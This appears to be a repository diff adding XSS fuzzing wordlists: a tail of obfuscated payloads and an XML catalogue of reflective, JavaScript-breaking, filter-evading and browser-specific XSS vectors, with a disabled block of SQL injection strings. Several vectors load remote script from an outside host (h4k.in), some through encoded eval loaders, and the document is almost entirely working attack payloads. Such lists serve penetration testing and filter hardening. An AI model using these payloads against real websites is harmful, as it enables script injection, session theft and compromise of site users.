<iframe/onreadystatechange=alert(42)
<!-- open comment
<!-- complete comment -->
--><!-- close/complete comment -->
<![CDATA[
<![CDATA[ open cdata
<![CDATA[ complete cdata ]]>
]]><![CDATA[ close/complete cdata ]]>
<?xml
<?xml version="1.0">
" value=``
onmouseover=\u0061\u006C\u0065\u0072\u0074('XSS')
onmouseover=\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF14\uFF12\u1450
<div style="{ left:expression( alert('XSS') ) }">
left:expr/**/ession(alert('XSS'))
left:expr/* */ession(alert('XSS'))
left:e\0078pr\0065ssion(alert('XSS'))
left:\0065\0078pr\0065ssion(alert('XSS'))
left:expr\65ssion(alert('XSS') ))
left:expr\0065ssion(alert('XSS'))
left:expr&#x65;ssion(alert('XSS'))
left:expr&#101;ssion(alert('XSS'))
left:expr&#x0065;ssion(alert('XSS'))
left:\ff45\ff58\ff50\ff52\ff45\ff53\ff53\ff49\ff4f\ff4e(alert('XSS'))
left:&#xff45;&#xff58;&#xff50;&#xff52;&#xff45;&#xff53;&#xff53;&#xff49;&#xff4f;&#xff4e;(alert('XSS'))
left:\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF14\uFF12\u1450
left:(alert('XSS'))
left:EXPR/**/ESSION(alert('XSS'))
left:EXPR/* */ESSION(alert('XSS'))
left:\ff25\ff38\ff30\ff32\ff42\ff53\ff33\ff29\ff2f\ff2e(alert('XSS'))
left:&#xff25;&#xff38;&#xff30;&#xff32;&#xff42;&#xff53;&#xff33;&#xff29;&#xff2f;&#xff2e;(alert('XSS'))
left:(alert('XSS'))
left:exp\0280essio\0274(alert('XSS'))
left:exp\0280essio\207f(alert('XSS'))
left:expʀessioɴ(alert('XSS'))
left:expʀessioⁿ(alert('XSS'))
%u00ABscript%u00BB
&#x3008;script&#x3009;
U%2bFF1CscriptU%2bFF1E
&#x2039;script&#x203A;
&#x2329;script&#x232A;
&#x27E8;script&#x27E9;
href="data:text/html;charset=utf-8,%3cscript%3econfirm(42);%3c/script%3e" UTF-8 URL-encoded
href="data:text/html;charset=utf-8,%3c%73%63%72%69%70%74%3e%63%6f%6e%66%69%72%6d%28%34%32%29%3b%3c%2f%73%63%72%69%70%74%3e" UTF-8 URL-encoded (all)
href="data:text/html;base64,PHNjcmlwdD5jb25maXJtKDQyKTs8L3NjcmlwdD4=" base64
href="data:text/html;charset=utf-7,+ADw-script+AD4-confirm(42)+ADsAPA-/script+AD4-" UTF-7
href="data:text/html;charset=utf-7,+ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAxACkAOwBoAGkAcwB0AG8AcgB5AC4AYgBhAGMAawAoACkAOwA8AC8AcwBjAHIAaQBwAHQAPgAKADwAcwBjAHIAaQBwAHQAPgBjAG8AbgBmAGkAcgBtACgANAAyACkAOwA8AC8AcwBjAHIAaQBwAHQAPg-" UTF-7 (all)
href="data:text/html;charset=utf-7,+ADwAcwBjAHIAaQBwAHQAPg-confirm(42)+ADsAPA-/script+AD4-" UTF-7/UTF-8 mix
href="data:text/html;charset=utf-7;base64,K0FEdy1zY3JpcHQrQUQ0LWNvbmZpcm0oNDIpK0FEc0FQQS0vc2NyaXB0K0FENC0=" UTF-7 in base64
href="data: text/html;charset=utf-7;base64,K0FEdy1zY3JpcHQrQUQ0LWNvbmZpcm0oNDIpK0FEc0FQQS0vc2NyaXB0K0FENC0=">obfuscated UTF-7 in base64
href="data:text/html;base64;charset=utf-7,+AFAASABOAGoAYwBtAGwAdwBkAEQANQBqAGIAMgA1AG0AYQBYAEoAdABLAEQAUQB5AEsAVABzADgATAAzAE4AagBjAG0AbAB3AGQARAA0AD0-" base64 in UTF-7
%22onmouseover%3d'alert(/PHP_SELF/)'%3d%22%3e
%20%22onmouseover%3d'alert(/PHP_SELF/)'%3d%22%3e
<%<!--'%><script>alert(42);</script -->

1287
Fuzzing/XSS/robot-friendly/XSS-EnDe-h4k.xml Normal file
View file

File diff suppressed because it is too large Load diff

534
Fuzzing/XSS/robot-friendly/XSS-EnDe-mario.xml Normal file
View file

@ -0,0 +1,534 @@
<?xml version="1.0"?>
<!-- from: http://mario.heideri.ch/xss.xml
date: 03-jan-08
minor formal modifications
-->
<xss>
<attack>
<name> --- Reflective XSS Attacks ---</name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name>Advanced XSS Locator</name>
<code>&apos;;alert(0)//\&apos;;alert(1)//&quot;;alert(2)//\&quot;;alert(3)//--&gt;&lt;/SCRIPT&gt;&quot;&gt;&apos;&gt;&lt;SCRIPT&gt;alert(4)&lt;/SCRIPT&gt;=&amp;{}&quot;);}alert(6);function xss(){//</code>
<desc>This is a modified version of the XSS Locator from ha.ckers.org</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Advanced XSS Locator for &amp;lt;title&amp;gt;-Injections</name>
<code>&apos;;alert(0)//\&apos;;alert(1)//&quot;;alert(2)//\&quot;;alert(3)//--&gt;&lt;/SCRIPT&gt;&quot;&gt;&apos;&gt;&lt;/title&gt;&lt;SCRIPT&gt;alert(4)&lt;/SCRIPT&gt;=&amp;{&lt;/title&gt;&lt;script&gt;alert(5)&lt;/script&gt;}&quot;);}</code>
<desc>This is a modified version of the XSS Locator from ha.ckers.org</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>HTML Breaking XSS 1 (all quotes)</name>
<code>&apos;&apos;;!--&quot;&lt;script&gt;alert(0);&lt;/script&gt;=&amp;{(alert(1))}</code>
<desc>HTML Breaker - tries to break the attribute injected in</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>HTML Breaking XSS 2 (double quotes)</name>
<code>&quot;&gt;&lt;script&gt;alert(0);&lt;/script&gt;</code>
<desc>HTML Breaker - tries to break the attribute injected in</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>HTML Breaking XSS 3 (single quotes)</name>
<code>&apos;&gt;&lt;script&gt;alert(0);&lt;/script&gt;</code>
<desc>HTML Breaker - tries to break the attribute injected in</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>HTML Breaking XSS 4 (attributes)</name>
<code>&apos;&lt;script&gt;alert(0);&lt;/script&gt;</code>
<desc>HTML Breaker - credits go to Alex</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Semicolon XSS (HTML)</name>
<code>&lt;img src=x onerror=;;alert(1) /&gt;</code>
<desc>HTML Breaker - credits go to Kishor</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Title-breaker</name>
<code>&lt;/title&gt;&lt;script&gt;alert(1)&lt;/script&gt;</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>HTML-breaking XSS for backticked attributes</name>
<code>`&gt; &lt;script&gt;alert(5)&lt;/script&gt;</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>Textarea-breaker (onmouseover)</name>
<code>&lt;/textarea&gt;&lt;br&gt;&lt;code onmouseover=a=eval;b=alert;a(b(/g/.source));&gt;MOVE MOUSE OVER THIS AREA&lt;/code&gt;</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>Noscrript-breaker (onmouseover)</name>
<code>&lt;/noscript&gt;&lt;br&gt;&lt;code onmouseover=a=eval;b=alert;a(b(/h/.source));&gt;MOVE MOUSE OVER THIS AREA&lt;/code&gt;</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>Style-breaker</name>
<code>}&lt;/style&gt;&lt;script&gt;a=eval;b=alert;a(b(/i/.source));&lt;/script&gt;</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name></name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name> --- Reflective JS XSS ---</name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name>JS Breaking XSS 1</name>
<code>;}alert(0);{</code>
<desc>JS Breaker - tries to break the javascript injected in</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>JS Breaking XSS 2 (string concatination)</name>
<code>&quot;+alert(0)+&quot;</code>
<desc>JS Breaker - tries to break the javascript injected in</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>onerror XSS Injection</name>
<code>xyz onerror=alert(6); </code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>onclick XSS Injection</name>
<code>onclick=eval/**/(/ale/.source%2b/rt/.source%2b/(7)/.source);</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>Plain JS XSS Injection 1</name>
<code>a=eval;b=alert;a(b(8));</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>Plain JS XSS Injection 2</name>
<code>a=1;a=eval;b=alert;a(b(11));//</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>String-breaking JS Injection (single qouted)</name>
<code>&apos;;//%0da=eval;b=alert;a(b(9));//</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>String-breaking JS Injection (double qouted)</name>
<code>&quot;;//%0da=eval;b=alert;a(b(10));//</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>String-breaking JS Injection (single qouted)</name>
<code>&apos;};a=eval;b=alert;a(b(13));//</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>JSON-breaking JS Injection (double qouted)</name>
<code>&quot;};a=eval;b=alert;a(b(12));//</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>JSON-breaking JS Injection (non-qouted)</name>
<code>1};a=eval;b=alert;a(b(14));//</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>Array-breaking JS Injection (sinlge qouted)</name>
<code>&apos;];a=eval;b=alert;a(b(15));//</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>Array-breaking JS Injection (double qouted)</name>
<code>&quot;];a=eval;b=alert;a(b(16));//</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>Array-breaking JS Injection (non qouted)</name>
<code>1];a=eval;b=alert;a(b(17));//</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>Int-breaking JS Injection (non qouted)</name>
<code>1;a=eval;b=alert;a(b(/c/.source));</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>CRLF-forced JS Injection</name>
<code>%0da=eval;b=alert;a(b(/d/.source));</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name>JS Comment breaker</name>
<code>*/a=eval;b=alert;a(b(/e/.source));/*</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name></name>
<code></code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser/>
</attack>
<attack>
<name> --- JS Includes ---</name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name>Tiny XSS Include 1 (20 characters, FFox only)</name>
<code>&lt;script src=//h4k.in</code>
<desc>Super-tiny inclusion vector - 20 characters length.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Tiny XSS Include 2 (27 characters - all browsers)</name>
<code>&lt;script src=http://h4k.in/&gt;</code>
<desc>Super-tiny inclusion vector for IE, FFox and Opera - 27 characters length. Credits go to kogir.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Tiny XSS Include 3 (30 characters - all browsers)</name>
<code>&lt;script src=//h4k.in&gt;&lt;/script&gt;</code>
<desc>Tiny inclusion vector for IE, FFox and Opera - 30 characters length.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Tiny XSS Include 4 (HTML Breaking)</name>
<code>&quot;&gt;&lt;script src=//h4k.in&gt;&lt;/script&gt;&lt;</code>
<desc>Tiny inclusion vector for IE, FFox and Opera - breaks HTML.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name></name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name> --- Fragmented DOM XSS ---</name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name>Include Fragment Pt. 1</name>
<code>&lt;scri</code>
<desc>First part of a fragmented inclusion attack vector. Swallows the enclosed HTML.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Include Fragment Pt. 2</name>
<code>pt src=//h4k.in&gt;&lt;</code>
<desc>Second part of a fragmented inclusion attack vector.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Include Fragment Pt. 3</name>
<code>&gt;&lt;/script&gt;</code>
<desc>Third part of a fragmented inclusion attack vector.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name></name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name> --- HTML Injection ---</name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name>Advanced HTML Injection Locator</name>
<code>&lt;s&gt;000&lt;s&gt;%3cs%3e111%3c/s%3e%3c%73%3e%32%32%32%3c%2f%73%3e&amp;#60&amp;#115&amp;#62&amp;#51&amp;#51&amp;#51&amp;#60&amp;#47&amp;#115&amp;#62&amp;#x3c&amp;#x73&amp;#x3e&amp;#x34&amp;#x34&amp;#x34&amp;#x3c&amp;#x2f&amp;#x73&amp;#x3e</code>
<desc>HTML injection vector.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>HTML Injection 1 (http://h4k.in/i.js)</name>
<code>&quot;&gt;&lt;script src=http://h4k.in/i.js&gt;&lt;/script&gt;</code>
<desc>HTML injection vector.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>HTML Injection 2 (using JS - http://h4k.in/i.js)</name>
<code>&quot;&gt;&lt;script&gt;a=document.createElement(&apos;script&apos;);a.src=&apos;http://h4k.in/i.js&apos;;document.body.appendChild(a);&lt;/script&gt;</code>
<desc>HTML injection vector.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name>HTML Injection 3 (using charcode - http://h4k.in/i.js)</name>
<code>&quot;&gt;&lt;script&gt;eval(String.fromCharCode(97,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,97,46,115,114,99,61,39,104,116,116,112,58,47,47,104,52,107,46,105,110,47,105,46,106,115,39,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,97,41,59))&lt;/script&gt;</code>
<desc>HTML injection vector.</desc>
<label>Reflective XSS Attacks</label>
<browser></browser>
</attack>
<attack>
<name></name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<!-- disabled 03-jan-08
<attack>
<name> ___ SQL Injections ___x</name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name>Basic SQL Injection 1</name>
<code> 1 OR 1 = 1 </code>
<desc>Very basic SQL Injection vector</desc>
<label>SQL Injection Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Basic SQL Injection 2</name>
<code>1' OR '1'='1</code>
<desc>Another basic SQL Injection vector</desc>
<label>SQL Injection Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Basic SQL Injection 3</name>
<code>1\'1</code>
<desc>Another basic SQL Injection vector</desc>
<label>SQL Injection Attacks</label>
<browser></browser>
</attack>
<attack>
<name>Basic SQL Injection 4</name>
<code>') OR 1 &lt; 2 #</code>
<desc>Another basic SQL Injection vector</desc>
<label>SQL Injection Attacks</label>
<browser/>
</attack>
<attack>
<name></name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
-->
<attack>
<name> --- Browser specific attacks ---</name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name>IE VBScript injection</name>
<code>vbscript:Execute(MsgBox(chr(88)&amp;chr(83)&amp;chr(83)))</code>
<desc>This works in IE only - use the PoC Link feature to test for this.</desc>
<label>Browser specific Attacks</label>
<browser>IE</browser>
</attack>
<attack>
<name>IE expression injection</name>
<code>&quot; style=&quot;color: expression(alert(0));&quot; a=&quot;</code>
<desc>This works in IE only - use the PoC Link feature to test for this.</desc>
<label>Browser specific Attacks</label>
<browser>IE</browser>
</attack>
<attack>
<name>IE closing-tag expression injection</name>
<code>&lt;/a style=&quot;&quot;xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')&quot;&gt;</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser>IE</browser>
</attack>
<attack>
<name>IE backticked semicolon injection</name>
<code>&lt;img src=`x` onrerror= ` ;; alert(1) ` /&gt;</code>
<desc></desc>
<label>Reflective XSS Attacks</label>
<browser>IE</browser>
</attack>
<attack>
<name>Mozilla -moz-binding-url injection</name>
<code>&quot; style=&quot;-moz-binding:url(http://h4k.in/mozxss.xml#xss);&quot; a=&quot;</code>
<desc>This works in Gecko browsers only.</desc>
<label>Browser specific Attacks</label>
<browser>Gecko</browser>
</attack>
<attack>
<name>Mozilla -moz-binding-url injection (filter evading)</name>
<code>&quot; sstyle=&quot;foobar&quot;tstyle=&quot;foobar&quot;ystyle=&quot;foobar&quot;lstyle=&quot;foobar&quot;estyle=&quot;foobar&quot;=-moz-binding:url(http://h4k.in/mozxss.xml#xss)&gt;foobar&lt;/b&gt;#xss)&quot; a=&quot;</code>
<desc>This works in Gecko browsers only. Was once used on php.net</desc>
<label>Browser specific Attacks</label>
<browser>Gecko</browser>
</attack>
<attack>
<name></name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name> --- Weird stuff ---</name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name>HTTP Reponse Splitting XSS</name>
<code>%0aContent-Type:text/html%0a%0a%3cscript%3ealert(0)%3c/script%3ehttp://www.google.de/</code>
<desc>HTTP response splitting vector with XSS alert</desc>
<label>Weird stuff</label>
<browser></browser>
</attack>
<attack>
<name>Nullbyte XSS</name>
<code>c%00&quot;&quot;&lt;script&gt;alert(0);&lt;/script&gt;</code>
<desc></desc>
<label>Weird stuff</label>
<browser></browser>
</attack>
<attack>
<name></name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name> --- Style injections and hw/fw-encoding attacks ---</name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name>BODY{-moz-binding:url(&quot;http://h4k.in/mozxss.xml%23xss&quot;)}</name>
<code>BODY{-moz-binding:url(&quot;http://h4k.in/mozxss.xml%23xss&quot;)}</code>
<desc></desc>
<label>hw/fw injections</label>
<browser/>
</attack>
<attack>
<name>x=alert;x(%26%2340 /finally through!/.source %26%2341);</name>
<code>x=alert;x(%26%2340 /finally through!/.source %26%2341);</code>
<desc></desc>
<label>hw/fw injections</label>
<browser/>
</attack>
<attack>
<name>%26%2339);x=alert;x(%26%2340 /finally through!/.source %26%2341);//</name>
<code>%26%2339);x=alert;x(%26%2340 /finally through!/.source %26%2341);//</code>
<desc></desc>
<label>hw/fw injections</label>
<browser/>
</attack>
<attack>
<name></name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name> --- URL injection ---</name>
<code></code>
<desc></desc>
<label></label>
<browser/>
</attack>
<attack>
<name>http://aa&amp;lt;script&amp;gt;alert(123)&amp;lt;/script&amp;gt;</name>
<code>http://aa&lt;script&gt;alert(123)&lt;/script&gt;</code>
<desc></desc>
<label>URL injection</label>
<browser/>
</attack>
</xss>

1080
Fuzzing/XSS/robot-friendly/XSS-EnDe-xssAttacks.xml Normal file
View file

File diff suppressed because it is too large Load diff

2690
Fuzzing/XSS/robot-friendly/XSS-payloadbox.txt Normal file
View file

File diff suppressed because it is too large Load diff